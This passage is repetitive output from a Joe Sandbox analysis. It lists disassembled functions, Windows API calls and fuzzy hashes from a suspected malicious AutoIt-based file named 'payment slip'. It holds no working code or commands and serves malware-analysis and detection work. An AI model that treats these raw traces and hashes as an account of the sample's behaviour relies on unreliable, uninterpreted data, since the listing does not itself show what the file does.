                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                        • String ID:
                                        • API String ID: 2829977744-0
                                        • Opcode ID: 82690222fc0aa2b550de9497f26db559ace917e1d4bfc2fb777a03748eee0560
                                        • Instruction ID: 4e1ea8a692c995e5be16e272dfa43275bd88d54a3ba74ba77d0f0a28a4f99ba4
                                        • Opcode Fuzzy Hash: 82690222fc0aa2b550de9497f26db559ace917e1d4bfc2fb777a03748eee0560
                                        • Instruction Fuzzy Hash: B491A371E046169ADB288E6CC881EEE7BF5AF49710F18C659E809E71C1DB39DD40CBA4
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Variant$ClearInit
                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                        • API String ID: 2610073882-625585964
                                        • Opcode ID: 438499526c2e3eda4c93caaa468d6b09610885b2189cd5952c7f2c827be334a5
                                        • Instruction ID: 9393ffabe03e67d0706163179a066173ddddc9f9aaeb9736c5c99e57a4ceffa2
                                        • Opcode Fuzzy Hash: 438499526c2e3eda4c93caaa468d6b09610885b2189cd5952c7f2c827be334a5
                                        • Instruction Fuzzy Hash: A1919471A04219AFDF24CFA5C884FEE7BB8EF46710F108559F505AB282DB709A45CFA1
                                        APIs
                                        • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 000A125C
                                        • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 000A1284
                                        • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 000A12A8
                                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 000A12D8
                                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 000A135F
                                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 000A13C4
                                        • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 000A1430
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ArraySafe$Data$Access$UnaccessVartype
                                        • String ID:
                                        • API String ID: 2550207440-0
                                        • Opcode ID: 8491ea46e7755f3965349e5d1d78ffe3f61aaa26eb2a034a735d8c62dcf24be2
                                        • Instruction ID: b45fcc2084245c86d6434f415e2ee6a4e3b1dfee7c9451190e988fbf42f2c2b8
                                        • Opcode Fuzzy Hash: 8491ea46e7755f3965349e5d1d78ffe3f61aaa26eb2a034a735d8c62dcf24be2
                                        • Instruction Fuzzy Hash: 9591AF75A00209AFEB119FD8C885BFEB7B9FF46315F108029E941EB292D775E941CB90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ObjectSelect$BeginCreatePath
                                        • String ID:
                                        • API String ID: 3225163088-0
                                        • Opcode ID: 145de2c4549b6239a485dd11fd3f3cebf4287acd1a500687f9ba4bbbe260f3b6
                                        • Instruction ID: 2bde1e01ad6c2e4fc892538105805a79cd3714bb8a54ca48eb2ce312759265c6
                                        • Opcode Fuzzy Hash: 145de2c4549b6239a485dd11fd3f3cebf4287acd1a500687f9ba4bbbe260f3b6
                                        • Instruction Fuzzy Hash: 369139B1D00219EFCB50CFA9CC84AEEBBB8FF49320F244569E515B7251D378AA41CB64
                                        APIs
                                        • VariantInit.OLEAUT32(?), ref: 000B396B
                                        • CharUpperBuffW.USER32(?,?), ref: 000B3A7A
                                        • _wcslen.LIBCMT ref: 000B3A8A
                                        • VariantClear.OLEAUT32(?), ref: 000B3C1F
                                          • Part of subcall function 000A0CDF: VariantInit.OLEAUT32(00000000), ref: 000A0D1F
                                          • Part of subcall function 000A0CDF: VariantCopy.OLEAUT32(?,?), ref: 000A0D28
                                          • Part of subcall function 000A0CDF: VariantClear.OLEAUT32(?), ref: 000A0D34
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                        • API String ID: 4137639002-1221869570
                                        • Opcode ID: 3c566b6b21ceb8beebe10efa134bf6f9883b902d5b7ce4f8a059817f416f48c0
                                        • Instruction ID: bfcfdcf2e9bd5f64f106a69a1bf6979de6af63be0d97887fe9dc495f295b8e7d
                                        • Opcode Fuzzy Hash: 3c566b6b21ceb8beebe10efa134bf6f9883b902d5b7ce4f8a059817f416f48c0
                                        • Instruction Fuzzy Hash: FA917A756083059FCB14DF28C4809AAB7E4FF89314F24892DF9899B352DB31EE05CB92
                                        APIs
                                          • Part of subcall function 0009000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0008FF41,80070057,?,?,?,0009035E), ref: 0009002B
                                          • Part of subcall function 0009000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0008FF41,80070057,?,?), ref: 00090046
                                          • Part of subcall function 0009000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0008FF41,80070057,?,?), ref: 00090054
                                          • Part of subcall function 0009000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0008FF41,80070057,?), ref: 00090064
                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 000B4C51
                                        • _wcslen.LIBCMT ref: 000B4D59
                                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 000B4DCF
                                        • CoTaskMemFree.OLE32(?), ref: 000B4DDA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                        • String ID: NULL Pointer assignment
                                        • API String ID: 614568839-2785691316
                                        • Opcode ID: 2bcf6baee4b2c58d648ead20f2068889aac64a7aaf28c5e8d9c87f943adeb85d
                                        • Instruction ID: 4cd38c0c8ed095859b41ef12860eb408c74b2d809695baaafad255ebe0fe0ffa
                                        • Opcode Fuzzy Hash: 2bcf6baee4b2c58d648ead20f2068889aac64a7aaf28c5e8d9c87f943adeb85d
                                        • Instruction Fuzzy Hash: E5910571D00219AFDF15DFA4C891EEEB7B9BF48310F10816AE919A7252DB749A44CFA0
                                        APIs
                                        • GetMenu.USER32(?), ref: 000C2183
                                        • GetMenuItemCount.USER32(00000000), ref: 000C21B5
                                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 000C21DD
                                        • _wcslen.LIBCMT ref: 000C2213
                                        • GetMenuItemID.USER32(?,?), ref: 000C224D
                                        • GetSubMenu.USER32(?,?), ref: 000C225B
                                          • Part of subcall function 00093A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00093A57
                                          • Part of subcall function 00093A3D: GetCurrentThreadId.KERNEL32 ref: 00093A5E
                                          • Part of subcall function 00093A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,000925B3), ref: 00093A65
                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 000C22E3
                                          • Part of subcall function 0009E97B: Sleep.KERNEL32 ref: 0009E9F3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                        • String ID:
                                        • API String ID: 4196846111-0
                                        • Opcode ID: fc975d1f49ffa10ced865a34f54caa4b18a87bc57ea6a472ec1d6080b6f55647
                                        • Instruction ID: 6acb90261540b76171d7643eb411b54bd7f652f45886609ec08061fcbae07421
                                        • Opcode Fuzzy Hash: fc975d1f49ffa10ced865a34f54caa4b18a87bc57ea6a472ec1d6080b6f55647
                                        • Instruction Fuzzy Hash: 84716C75A00205AFDB15EFA4C845FAEB7F5EF48310F14846DE81AEB752DB34AE418B90
                                        APIs
                                        • GetParent.USER32(?), ref: 0009AEF9
                                        • GetKeyboardState.USER32(?), ref: 0009AF0E
                                        • SetKeyboardState.USER32(?), ref: 0009AF6F
                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 0009AF9D
                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 0009AFBC
                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 0009AFFD
                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 0009B020
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: MessagePost$KeyboardState$Parent
                                        • String ID:
                                        • API String ID: 87235514-0
                                        • Opcode ID: 70d12ae81cba0e39a921ef8510c574cac90c996b6a8658599eb102a05ec356fc
                                        • Instruction ID: 0e13629705a38a930f69e8bbc1b842666b13620a744b83b577f27c1db84b0108
                                        • Opcode Fuzzy Hash: 70d12ae81cba0e39a921ef8510c574cac90c996b6a8658599eb102a05ec356fc
                                        • Instruction Fuzzy Hash: A951DFA0A047D53DFF368374CD59BBABEE95B06314F088499E1E9458C3C398A8C8E791
                                        APIs
                                        • GetParent.USER32(00000000), ref: 0009AD19
                                        • GetKeyboardState.USER32(?), ref: 0009AD2E
                                        • SetKeyboardState.USER32(?), ref: 0009AD8F
                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0009ADBB
                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0009ADD8
                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0009AE17
                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0009AE38
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: MessagePost$KeyboardState$Parent
                                        • String ID:
                                        • API String ID: 87235514-0
                                        • Opcode ID: 4f6cf34f0c11ff043fb7a3eb65db32e97cf1547919b5c3012f9d66d7785e4f5a
                                        • Instruction ID: 9a8ce4a993447c4808671d049b3f6fc21ebdc6990d0999d53c26849d815cf942
                                        • Opcode Fuzzy Hash: 4f6cf34f0c11ff043fb7a3eb65db32e97cf1547919b5c3012f9d66d7785e4f5a
                                        • Instruction Fuzzy Hash: A551B6A1A057D53DFF3683348C55BBA7ED95B47300F088589E1D6468C3D694EC84F7A2
                                        APIs
                                        • GetConsoleCP.KERNEL32(00073CD6,?,?,?,?,?,?,?,?,00065BA3,?,?,00073CD6,?,?), ref: 00065470
                                        • __fassign.LIBCMT ref: 000654EB
                                        • __fassign.LIBCMT ref: 00065506
                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00073CD6,00000005,00000000,00000000), ref: 0006552C
                                        • WriteFile.KERNEL32(?,00073CD6,00000000,00065BA3,00000000,?,?,?,?,?,?,?,?,?,00065BA3,?), ref: 0006554B
                                        • WriteFile.KERNEL32(?,?,00000001,00065BA3,00000000,?,?,?,?,?,?,?,?,?,00065BA3,?), ref: 00065584
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                        • String ID:
                                        • API String ID: 1324828854-0
                                        • Opcode ID: 0e0e73682c3d7277856a4cd84a869dba7bdc2b47f3cb60f646c84791b567f5ec
                                        • Instruction ID: 903f0b1c0a15e235267dc5133c67e7fa48868f69db26e08795fce502499da723
                                        • Opcode Fuzzy Hash: 0e0e73682c3d7277856a4cd84a869dba7bdc2b47f3cb60f646c84791b567f5ec
                                        • Instruction Fuzzy Hash: 7151B170A007499FDB11CFA8DC59AEEBBFAEF09301F14415AF956E7291D6309A41CB60
                                        APIs
                                        • SetWindowLongW.USER32(00000002,000000F0,?), ref: 000C6C33
                                        • SetWindowLongW.USER32(?,000000EC,?), ref: 000C6C4A
                                        • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 000C6C73
                                        • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,000AAB79,00000000,00000000), ref: 000C6C98
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 000C6CC7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Window$Long$MessageSendShow
                                        • String ID: U
                                        • API String ID: 3688381893-2399391058
                                        • Opcode ID: 2f616260564b1691130adde79e24eb1192074ffcfb0b3362d39e6aa08be2cc35
                                        • Instruction ID: c3c5ff4a7c6dab513f0d076fdea1f27a5529048c23246c3e689f2f67d8e17045
                                        • Opcode Fuzzy Hash: 2f616260564b1691130adde79e24eb1192074ffcfb0b3362d39e6aa08be2cc35
                                        • Instruction Fuzzy Hash: A741AF35A04104AFEB34CF68CD99FBD7BE5EB09350F14022CF899A72A1C372AD41DA80
                                        APIs
                                        • _ValidateLocalCookies.LIBCMT ref: 00052D4B
                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00052D53
                                        • _ValidateLocalCookies.LIBCMT ref: 00052DE1
                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00052E0C
                                        • _ValidateLocalCookies.LIBCMT ref: 00052E61
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                        • String ID: csm
                                        • API String ID: 1170836740-1018135373
                                        • Opcode ID: 1149645a6002ec1dd9695e1bbc38bfbb1220038b0af48d4af4e248001699f604
                                        • Instruction ID: 1e9e557dd8ccd925e56feb4d297d92846c57602b8fae30ac730abbdeca22916c
                                        • Opcode Fuzzy Hash: 1149645a6002ec1dd9695e1bbc38bfbb1220038b0af48d4af4e248001699f604
                                        • Instruction Fuzzy Hash: 3F419634E002099BCF14DF68C845AEFBBF5BF46356F148155ED146B352DB35AA09CBA0
                                        APIs
                                          • Part of subcall function 000B304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 000B307A
                                          • Part of subcall function 000B304E: _wcslen.LIBCMT ref: 000B309B
                                        • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 000B1112
                                        • WSAGetLastError.WSOCK32 ref: 000B1121
                                        • WSAGetLastError.WSOCK32 ref: 000B11C9
                                        • closesocket.WSOCK32(00000000), ref: 000B11F9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                        • String ID:
                                        • API String ID: 2675159561-0
                                        • Opcode ID: d6ab2eda3ba5c149e6fc4915bd01e4360ce83fd9a71adcc9a03fa9309c532fd9
                                        • Instruction ID: c38a939d079140a84f6df5a2b446483fd668b3fb2530a326c63eca0d53f7595f
                                        • Opcode Fuzzy Hash: d6ab2eda3ba5c149e6fc4915bd01e4360ce83fd9a71adcc9a03fa9309c532fd9
                                        • Instruction Fuzzy Hash: DF410331600604AFEB109F18C894FEABBE9EF45324F548559FD19AB292C774ED41CBE0
                                        APIs
                                          • Part of subcall function 0009DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0009CF22,?), ref: 0009DDFD
                                          • Part of subcall function 0009DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0009CF22,?), ref: 0009DE16
                                        • lstrcmpiW.KERNEL32(?,?), ref: 0009CF45
                                        • MoveFileW.KERNEL32(?,?), ref: 0009CF7F
                                        • _wcslen.LIBCMT ref: 0009D005
                                        • _wcslen.LIBCMT ref: 0009D01B
                                        • SHFileOperationW.SHELL32(?), ref: 0009D061
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                        • String ID: \*.*
                                        • API String ID: 3164238972-1173974218
                                        • Opcode ID: a4092acd6574b36e86b78ec00d555fde9eaa22f1660223ec15b4c6ca205666c7
                                        • Instruction ID: 1bf9bec96affcc041397733c8b09d082c3c8390f88500718f4a5f05c53052399
                                        • Opcode Fuzzy Hash: a4092acd6574b36e86b78ec00d555fde9eaa22f1660223ec15b4c6ca205666c7
                                        • Instruction Fuzzy Hash: 90414871D451185FEF52EBA4D991EDEB7F9AF44380F1000E6E509EB142EA34AB48DB50
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00097769
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0009778F
                                        • SysAllocString.OLEAUT32(00000000), ref: 00097792
                                        • SysAllocString.OLEAUT32(?), ref: 000977B0
                                        • SysFreeString.OLEAUT32(?), ref: 000977B9
                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 000977DE
                                        • SysAllocString.OLEAUT32(?), ref: 000977EC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                        • String ID:
                                        • API String ID: 3761583154-0
                                        • Opcode ID: 4646a9320a11c97dd84d00bf89f2094b95a2183d7281dcef455a541d19b5f230
                                        • Instruction ID: 9c6a1ab7598dfa00514371d9415759930cbe89a353e86a6cb9e8f5d5b9f75743
                                        • Opcode Fuzzy Hash: 4646a9320a11c97dd84d00bf89f2094b95a2183d7281dcef455a541d19b5f230
                                        • Instruction Fuzzy Hash: 0A21C176608219AFEF10DFE9CC88CBBB3ECEB093647048025FA08DB2A1D674DC419764
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00097842
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00097868
                                        • SysAllocString.OLEAUT32(00000000), ref: 0009786B
                                        • SysAllocString.OLEAUT32 ref: 0009788C
                                        • SysFreeString.OLEAUT32 ref: 00097895
                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 000978AF
                                        • SysAllocString.OLEAUT32(?), ref: 000978BD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                        • String ID:
                                        • API String ID: 3761583154-0
                                        • Opcode ID: 0d05d060b40d68d3ba46d7204efbea75cac6de38bba49924f493949fa1e42a40
                                        • Instruction ID: 3ec5d8334ab16ec2b8fe63b24c959483560347105ae335d51537664b38bfd459
                                        • Opcode Fuzzy Hash: 0d05d060b40d68d3ba46d7204efbea75cac6de38bba49924f493949fa1e42a40
                                        • Instruction Fuzzy Hash: 6A219D72608204AFEF14AFA8DC88DBB77ECEB093607148125F919CB2A1DA74DC41DB74
                                        APIs
                                        • GetStdHandle.KERNEL32(0000000C), ref: 000A04F2
                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 000A052E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
